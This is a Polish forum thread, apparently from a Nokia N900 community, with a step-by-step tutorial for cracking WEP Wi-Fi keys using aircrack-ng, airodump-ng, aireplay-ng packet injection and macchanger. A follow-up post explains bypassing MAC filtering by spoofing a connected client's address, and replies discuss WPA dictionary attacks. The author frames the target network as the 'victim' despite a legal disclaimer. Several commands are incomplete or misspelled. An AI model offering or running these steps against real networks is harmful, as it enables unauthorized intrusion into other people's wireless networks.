Zacznę od tego iż włamywanie się do sieci w naszym kraju jest zabronione pod karą więzienia a zatem poniższa wypowiedz ma mieć wyłącznie wartość naukową nie biorę odpowiedzialności za ewentualne przypadki naruszenia prawa.
zatem na początek uprzedzę takie głupie pytania bądź stwierdzenia jak na przykład :
"Aircrack w nokiach n900 działa tylko na kanale 10"- jest to bzdura aircrack obsługuje wszystkie kanały
"Nokia n900 ma za małą moc obliczeniową aby złamać hasło wep"-głupota ponieważ procesor noki śmiało nadaje się do tego celu, choć na pewno pociągnie sporo baterii a telefon się spoci ale wepa złamie.
"aircrack obsługuje tylko karty zewnętrzne"- także głupstwo ponieważ lista sterowników obsługujących aircracka jest dość pokaźna (na pewno obsługuje nokiowe sterowniki)
Zaprezentuję tylko sposób na złamanie WEP'a gdyż WPA nie łamałem przy pomocy telefony a ponadto do tego potrzebne są słowniki.
Zaczynamy
1. Należy wziąć pod uwagę fakt iż niema sensu brać się do dzieła bez naładowanej w pełni baterii gdyż proces łamania haseł jest prądo żerny.
2.Proponuje wszystkie komendy skopiować sobie do notatnika w telefonie ponieważ będzie wtedy wiele łatwiej i szybciej na zasadzie "kopiuj wklej"
3.Odpalamy terminala i wpisujemy (aby zainstalować aircracka oraz macchanger'a):
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
iwconfig wlan0 mode monitor
ifconfig wlan0 up
teraz objaśnienia
ifconfig interface down -powoduje wyłączenia karty wlan
macchanger --mac -powoduje zmianę naszego adresu mac na podany przydatne jeżeli sieć ma włączone filtrowanie adresów mac
ifconfig interface up -powoduje włączenie karty wlan z ustawieniami
5.W terminalu wpisujemy :
Cytat:
airodump-ng wlan0
airdump-ng interface -za pomocą tego narzędzia wyszukujemy "ofiarę"
Zapisujemy kanał na którym znajduje się accespoint oraz jego bssid (mac) bedą nam dalej niezbędne!
Cytat:
airdump-ng -c -w wep --bssid wlan0
c- za literką "c" wpisujemy kanał "ofiary"
w-za literką "w" wpisujemy nazwę pliku w którym będą zapisywane przechwycone pakiety.
6 Otwieramy nowe okno terminala nie zamykając poprzedniego (w starym zbierają sie pakiet nazwane a ich liczba to "DATA")
Cytat:
aireplay-ng -1 0 -a -h wlan0
aireplay-ng służy do przeprowadzania ataków które wymuszą szybsze zbieranie pakietów
-1 gdzie 1 wpisujemy numer ataku (nr 1 służy do sztucznego wymuszania pakietów od ap)
0 -czas ataku
-h nasz mac (bądź osoby podłączonej jej adres widzimy na dole w airdumpie)
-a mac sieci atakowanej
Następnie drugi atak :
Cytat:
aireplay-ng -3 -b -h wlan0
-3-typ ataku
-b- bssid adres mac "ofiary"
-h nasz adres mac bądź klienta sieci
możemy stosować także inne typy ataków zależnie od sytuacji
7. teraz oczekujemy aż w oknie airodump"a uzbiera się minimum 5000 pakietów ja zbieram do ok 10000-100000 tys pakietów ponieważ ilość pakietów wpływa na prędkość z jaka aircrack wyszuka hasło.
8. Odpalamy nowe okno terminala (nie zamykając poprzednich) i wpisujemy :
ls aby znalesc nazwe pliku z capami jakie nazbieralimy w tym przypadku bedzie to wep-01.cap
Cytat:
aircrack-ng -p 2 wep-01.cap
i czekamy aż aircrack znajdzie nasze hasełko:)
w przyszłości napiszę jeszcze o WPA
rozpowszechnianie artykułu bez mojej zgody zabronione
Model telefonu: N900
Wiek: 21 Dołączył: 09 Sie 2010 Posty: 576 Piwa: 33/10 Skąd: Z kernela
Wysłany: 25-12-2010, 10:41
Na filmiku na YT jest pokazane, że koleś aplikuje jakieś patche.
Jesteś aby pewny, czy na pewno n900 obsługuje inne kanały niż 10?
Swojego czasu trochę się tym interesowałem, ale jakoś porzuciłem temat.
Hmm powiem tak mi bez problemu telefon obsługuje monitor mode dla wszystkich kanałów, ostatnio nawet "crackowałem " siec na kanale 1 i 6 i nie było problemów ale prawdą jest że mam najnowszego power krenela wiec nie wiem .
a co do patha na filmiku to powiem szczerze że sam nie wiem o co chodziło.
Szukam jakiegoś dobrego słownika do złamania wpa. Może ktoś coś polecić??
Model telefonu: N900
Wiek: 21 Dołączył: 09 Sie 2010 Posty: 576 Piwa: 33/10 Skąd: Z kernela
Wysłany: 01-01-2011, 2:05
@arcean wielkie piwko dla Ciebie :D heh i pomyslec ze probowalem poprzez apt-get install iwconfig :D
[ Dodano: 01-01-2011, 5:16 ]
hmn post napisalem nie sprawdzajac tego.
niestety polecenie iwconfig nie chodzi dalej.
jedyne co mi chodzi to iw.
to jest to samo??
bo iw wlan0 mode monitor daje mi usage.
co prawda moglem napisac iw wlan0 set monitor none
ale nie wiem czy to to samo.
bo wlasnie cos mi nie chodzi to chyba...
[ Dodano: 01-01-2011, 9:29 ]
Hmn okazało się, że to nie był ten pakiet.
Trzeba zainstalować pakiecik wireless-tools (apt-get install wireless-tools)
i teraz komenda śmiga :)
Jeszcze będąc w temacie dopowiem ze za pomocą airodumpa i macchangera można dostać się do sieci zabezpieczonej filtracją mac.
Aby tego dokonać wpisujemy :
Cytat:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Potem odpalamy airopumpa:
Cytat:
airodump-ng wlan0
Odszukujemy żądaną sieć i wpisujemy
Cytat:
airdump-ng -c - --bssid wlan0
c- za literką "c" wpisujemy kanał "ofiary"
Następnie obserwujemy ruch w sieci i wybieramy adres jednego z klientów i wpisujemy
Cytat:
ifconfig wlan0 down
macchanger --mac wlan0
ifconfig wlan0 up
gdzie po słowie --mac wpisujemy adres jednego z klientów
łączymy się normalnie i cieszymy się z dostępu do sieci :)
kopiowanie bez mojej zgody zabronione
Kilka sów o WPA
Na wpa jest jeden sposób i jest to właśnie atak słownikowy
no i właśnie pytanie skąd wziąć dobry słownik ??
ja mam ze 3 słowniki ale np w żadnym z nich niema akurat hasełka do mojej prywatnej sieci gdzie mam wpa/psk . problem jest także taki że słowniki zajmują po parę giba:P
Ze złamaniem WPA jest zatem jak z trafieniem w totka a WPA2 na chwilę obecną nie da się złamać.
Jak znajdę jakiś sposób i oczywiście przetestuję napiszę tutorial :)
hmm na windows mobile jest program ktory lamie hasla lecz nie wiem czy wep i wap
jednak spotkalem sie z przypadkami gdy haslo bylo takie same jak nazwa sieci i nie bylo problemu
a poza tym forum wychowuje nam kryminalistow xD
Witam, mam problem. Próbuje złamać zabezpieczenie swojej domowej sieci (WEP) dla celów edukacyjnych. Na początku wyszukuje mi AP i klientów (w tym przypadku router i e51), ale kiedy przychodzi do przechwytywania pakietów, to rzadnych nie przechwytuje, rośnie liczba pakietów kontrolnych (Beacons), i Packets klienta, ale #Data ciągle zero. Ktoś wie dlaczego tak jest? ps. nie wiem czy to ma znaczenie ale jeśli na początku zrobię "sudo gainroot" to airodumpa sie nie da zrobić, ale jesli zaczne od "root" to smiga
Nie możesz pisać nowych tematów Nie możesz odpowiadać w tematach Nie możesz zmieniać swoich postów Nie możesz usuwać swoich postów Nie możesz głosować w ankietach Nie możesz załączać plików na tym forum Nie możesz ściągać załączników na tym forum
